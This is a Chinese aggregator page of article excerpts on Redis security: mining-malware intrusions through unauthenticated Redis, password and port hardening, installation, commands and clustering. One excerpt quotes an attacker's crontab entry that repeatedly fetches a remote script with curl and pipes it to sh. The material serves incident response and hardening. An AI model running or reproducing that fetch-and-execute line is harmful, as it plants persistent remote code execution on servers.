02 Redis防止入侵】的更多相关文章

在使用云服务器时,安装的redis3.0+版本都关闭了protected-mode,因而都遭遇了挖矿病毒的攻击,使得服务器99%的占用率!! 因此我们在使用redis时候,最好更改默认端口,并且使用redis密码登录. (1)redis没有用户概念,redis只有密码(2)redis默认在工作在保护模式下.不允许远程任何用户登录的(protected-mode) redis.conf设置 protected-mode yes #打开保护模式 port 6380 #更改默认启动端口 require…
目录: 1.1 在centos6.5中安装Redis 1.2 Redis的简介及两种基本操作 1.3 Redis对string操作(第一类) 1.4 redis对Hash操作,字典格式(第二类) 1.5 redis对List操作(第三类) 1.6 redis对Set集合操作,Set集合就是不允许重复的列表(第四类) 1.7 redis对有序集合操作(第五类) 1.8 redis其他常用操作 1.9 redis的管道使用(通过管道向指定db传送数据) 1.10 发布订阅(一对多的广播) 1.11…
▲针对全球6379端口的redis服务器做了扫描,结果如上图 如图开放在公网的redis的6379端口的ip总数有63443个.无密码认证的IP有43024个,在总数占比里达到67%.发现遭受到redis crackit事件影响的服务器达到35024,在总数占比中达到55%,在无密码认证的redis数量中占比达到81%左右. 事件描述 很多使用者都是把redis下载到服务器直接运行使用,无ACL,无密码,root运行,且绑定在0.0.0.0:6379,暴露在公网.攻击者在未授 权访问 Redis…
今天发现服务器有异常进程/opt/yam/yam,上网搜了搜,是由于redis未授权引起的入侵,查了些资料,这里做下总结. 1. 现象 有以下其一现象就要注意是否被入侵 crontab -l 可以看到类似"*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 | sh". ps -ef 可以看到进程 "/opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4U…
Redis高可用概述 ​ 在 Web 服务器中,高可用 是指服务器可以 正常访问 的时间,衡量的标准是在 多长时间 内可以提供正常服务(99.9%.99.99%.99.999% 等等).在 Redis 层面,高可用 的含义要宽泛一些,除了保证提供 正常服务(如 主从分离.快速容灾技术 等),还需要考虑 数据容量扩展.数据安全 等等. 在 Redis 中,实现 高可用 的技术主要包括 持久化.复制.哨兵 和 集群,下面简单说明它们的作用,以及解决了什么样的问题: 持久化:持久化是 最简单的 高可用…
好吧,我也做了回标题党,像我这么细心的同学,怎么可能让服务器被入侵呢? 其实是这样的,昨天我和一个朋友聊天,他说他自己有一台云服务器运行了 Redis 数据库,有一天突然发现数据库里的数据全没了,只剩下一个奇奇怪怪的键值对,其中值看起来像一个 RSA 公钥的字符串,他以为是误操作删库了,幸好自己的服务器里没啥重要的数据,也就没在意. 经过一番攀谈交心了解到,他跑了一个比较古老已经停止维护的开源项目,安装的旧版本的 Redis,而且他对 Linux 的使用不是很熟练.我就知道,他的服务器已经被攻陷…
1.集群环境 1.Linux服务器列表 使用4台CentOS Linux服务器搭建环境,其IP地址如下: 192.168.110.100 192.168.110.101 192.168.110.102 192.168.110.103 2.Redis服务部署环境 192.168.110.100 启动多个Redis sentinel服务,构成Redis sentinel集群 192.168.110.101 启动Redis服务,设置成主节点 192.168.110.102 启动Redis服务,设置成1…
127.0.0.1:6379> shutdown (error) ERR Errors trying to SHUTDOWN. Check logs. 1.在redis.conf中修改日志文件的位置 #日志文件位置 logfile /usr/local/redis/log-redis.log 2.更改log-redis.log文件的权限 chmod 777 log-redis.log 3.conf文件 修改数据本地保存文件配置 #指定本地数据库文件名 dbfilename dump.rdb #指…
top 看到一个bashd的进程占据了cpu ps aux |grep bashd cd /tmp 发现ddg.2011 的文件.root dump.rdb 在/root/.ssh  也有奇怪的文件 vim /etc/sshd/sshd_config 被人修改过 cd /var/spool/cron 被人加了新的crontab 全部删除,crontab 里面有他执行的脚本和命令,服务器ip: 在/etc/ 下有一个/etc/redis-sentinel.conf  监视redis 进程的配置文件…
因为我这里使用的是centos7 mini版本,需要安装gcc,通过下图显示命令安装gcc(因为redis是由C语言开发而来,所以需要安装gcc编译环境). linux安装好后可以区官网下载redis(www.redis.cn). 通过xftp工具上传到linux的/opt目录下,执行解压操作“tar xzf redis-4.0.1.tar.gz”,解压完后,同目录下可以看到同名的解压文件夹. 解压完后进入到:“cd redis-4.0.1”执行“make”命令 make命令执行后可以看到一长串…
一.客户端命令行参数 1.-x 从标准输入读取一个参数,等价于set k v [root@localhost etc]# echo -en 'v1'|redis-cli -a foobared -x set k1 OK [root@localhost etc]# redis-cli -a foobared get k1 "v1" 2.-r 重复执行一个命令指定次数 [root@localhost etc]# redis-cli -a foobared -r 2 get k1 "…
需求 功能: P15 发布文章 获取文章 文章分组 投支持票 数值及限制条件 P15 如果一篇文章获得了至少 200 张支持票,那么这篇文章就是一篇有趣的文章 如果这个网站每天有 50 篇有趣的文章,那么网站要把这 50 篇文章放到文章列表页前 100 位至少一天 支持文章评分(投支持票会加评分),且评分随时间递减 实现 投支持票 P15 如果要实现评分实时随时间递减,且支持按评分排序,那么工作量很大而且不精确.可以想到只有时间戳会随时间实时变化,如果我们把发布文章的时间戳当作初始评分,那么后发…
0x00 简要说明 百度百科:Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写.支持网络.可基于内存亦可持久化的日志型.Key-Value数据库,并提供多种语言的API. Redis因配置不当可导致攻击者直接获取到服务器的权限. 利用条件:redis以root身份运行,未授权访问,弱口令或者口令泄露等 环境准备: 测试环境 IP Kali 192.168.100.99 靶机(CentOS 7) 192.168.100.101…
Redis基础知识 1).测试redis服务的性能: redis-benchmark 2).查看redis服务是否正常运行: ping 如果正常---pong 3).查看redis服务器的统计信息: info 查看redis服务的所有统计信息 info [信息段] 查看redis服务器的指定的统计信息,如:info Replication 4).redis的数据库实例:作用类似于mysql的数据库实例,redis中的数据库实例只能由redis服务来创建和维护,开发人员不能修改和自行创建数据库实例…
set hi hello 设置值 get hi 获取值 keys * 查询出所有的key memcached 不能查询出所有的key keys *h 模糊查找key keys h[ie] 模糊查找 keys o?e 通配单个字符 randomkey 随机key type age 查询出是啥类型 exists key 判断是否存在该key del hi 删除某个key rename one two 修改key名 renamenx one hi 如果存在one则修改,不存在则不修改返回0 ttl h…
redis安装: windows安装包:http://pan.baidu.com/s/1i3jLlC5 下载下来之后,开始安装: redis-server.exe redis.conf: 简单一步,安装成功,保持这个windows持续运行~ 查看一下我们本机的端口,可以看到多了一个6379端口,安全风险来了,记得设置redis的密码~ 接下来,开始利用redis-cli.exe来进行远程redis的入侵: 如果远程redis数据库存在未授权访问漏洞,则可以直接上传shell: 开启redis客户…
今天听一个同事说新浪使用的是Redis,于是自己将研究的过程整理出来以备后用. 我们都知道微博这玩意儿现在很火,新浪作为国内最早使用redis,并且是国内最大的redis使用者,当然备受人们关注.新浪微博中一项很重要数据,计数类业务就用到了Redis.OK,废话不多说,直接切入主题.  Redis是什么? 解析:一种内存型数据库,虽然其拥有了持久化机制. Redis配置过程 首先声明,今天我们探讨的配置是在windows系统下 步骤一:下载redis文件包 下载的windows版本是redis-…
http://www.cnblogs.com/tianqiq/p/4309791.html http://www.cnblogs.com/it-cen/p/4312098.html http://www.cnblogs.com/alexkn/p/4314143.html http://www.cnblogs.com/vchenpeng/p/4325256.html 360导航_新一代安全上网导航 http://www.cnblogs.com/ysyn/p/4326303.html   用redi…
环境 由于不太熟悉docker,所以,把docker当虚拟机来用,服务器环境如下: Redis Server 环境搭建 Redis Server 01 搭建 并且制作Redis镜像 容器建立 # docker run -i -t --name redis_server_01 --net mynetwork --ip : -v /root/redis_data:/redis centos /bin/bash 容器中必要包下载 # yum install wget gcc make vim -y 下…
目录 redis漏洞 入侵特征 安全隐患 redis安全规范 禁止root用户启动 限制redis文件目录访问权限 开启密码认证,设置复杂密码 禁用或重命名危险命令 设置允许监听地址,不要使用0.0.0.0 尽量修改默认端口6379 信任的内网运行,尽量避免有公网访问 Redis漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Red…
一.Redis基本介绍 (1)Redis介绍 Redis 是一个开源(BSD许可)的,内存中的数据结构存储系统,它可以用作数据库.缓存和消息中间件. 它支持多种类型的数据结构,如 字符串(strings), 散列(hashes), 列表(lists), 集合(sets), 有序集合(sorted sets) 与范围查询,` bitmaps,hyperloglogs 和 地理空间(geospatial) 索引半径查询.Redis 内置了 复制(replication), LUA脚本(Lua scr…
redis在Windows下以后台服务一键搭建集群(多机器) 一.概述 此教程介绍如何在windows系统中多台机器之间布置redis集群,同时要以后台服务的模式运行.布置以脚本的形式,一键完成.多台机器之间布置集群比单台机器布置伪集群复杂得多,关于单机伪集群布置,参见另博文<redis在Windows下以后台服务一键搭建集群(单机--伪集群)>. 二.准备的工具与环境 此节准备环境部分,与<redis在Windows下以后台服务一键搭建集群(单机--伪集群)>说明一样,不同的是,…
漏洞概述 近日,互联网出现watchdogs挖矿病毒,攻击者可以利用Redis未授权访问漏洞入侵服务器,通过内外网扫描感染更多机器.被感染的主机出现 crontab 任务异常.系统文件被删除.CPU 异常等情况,并且会自动感染更多机器,严重影响业务正常运行甚至导致崩溃. 在此,小哥建议您及时开展Redis业务自查并进行升级修复,避免业务和经济损失. 漏洞影响 1.数据泄露.Redis被远程控制,泄漏敏感业务数据 2.病毒感染.如果机器本身未加固,可通过Redis漏洞入侵主机资源,并进行系统破坏.…
Redis的服务器信息状态信息查看 Redis的提供了一个信息命令查看Redis的服务器的信息,类似的Linux提供一个顶级命令查看系统的信息 redis-cli info # Server #服务器的信息 redis_version: #redis服务器版本 redis_git_sha1: #Git SHA1 redis_git_dirty: #Git dirty flag redis_build_id:d2228e273f4aff2f #redis build id redis_mode:s…
UCloud-201809-001:Redis服务未授权访问漏洞安全预警 尊敬的UCloud用户,您好! 发布时间  2018-09-11更新时间  2018-09-11漏洞等级  HighCVE编号  漏洞详情近日UCloud安全中心监测到多起Redis入侵勒索事件,攻击者通过开放在公网的未授权的Redis服务入侵.控制用户主机,进而删除.加密用户数据并对用户进行恶意勒索,影响严重. 影响范围开放在公网且无鉴权认证的Redis服务 修复方案1.修改数据库配置文件,禁止公网访问:修改配置文件re…
1. 安装依赖包 注意:本节需要使用root用户操作 1.1 安装ruby yum install ruby -y yum install ruby-devel.x86_64 -y 1.2 安装rubygem 有些系统默认没有rubygems的包,可能需要手动安装,先安装好ruby-irb和ruby-rdoc,然后操作以下步骤. (1) 下载rubygem包,https://rubygems.org/?locale=zh-CN (2) 上传rubygems-2.4.8.zip至/redis目录…
Redis 中 key 的过期删除策略 前言 Redis 中 key 的过期删除策略 1.定时删除 2.惰性删除 3.定期删除 Redis 中过期删除策略 从库是否会脏读主库创建的过期键 内存淘汰机制 内存淘汰触发的最大内存 有哪些内存淘汰策略 内存淘汰算法 LRU LFU 总结 参考 Redis 中 key 的过期删除策略 前言 Redis 中的 key 设置一个过期时间,在过期时间到的时候,Redis 是如何清除这个 key 的呢? 这来分析下 Redis 中的过期删除策略和内存淘汰机制 R…
前言 一.资源 Ref: https://www.imooc.com/video/2870 二.缓存 缓存:静态缓存.Memcache.redis缓存 Ref: [Laravel] 09 - Functional models put(), add(), forever(), has(), get(), pull(), forget() 配置文件:[config/cache.php] 注意,本篇的缓存是php,而非基于laravel. 静态缓存 一.生成静态缓存 获取文件的当前目录:dirnam…
卷 TOSHIBA EXT 的文件夹 PATH 列表卷序列号为 AE86-8E8DF:.│ python就业班-淘宝-目录.txt│ ├─01 网络编程│ ├─01-基本概念│ │ 01-网络通信概述.flv│ │ 02-IP地址.flv│ │ 03-Linux.windows查看网卡信息.flv│ │ 04-ip地址的分类-ipv4和ipv6介绍.flv│ │ 05-(重点)端口.mp4│ │ 06-端口分类:知名端口.动态端口.flv│ │ 07-socket介绍.mp4│ │ │ ├─02…
一.前言 前段时间,在做内网影响程度评估的时候写了扫描利用小脚本,扫描后统计发现,内网中60%开放了redis6379端口的主机处于可以被利用的危险状态,因为都是一些默认配置造成的考虑到本社区大部分开发者都会使用redis,特此分享下以便大家可以对自己公司的内网进行一个排查. 二.漏洞介绍 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取…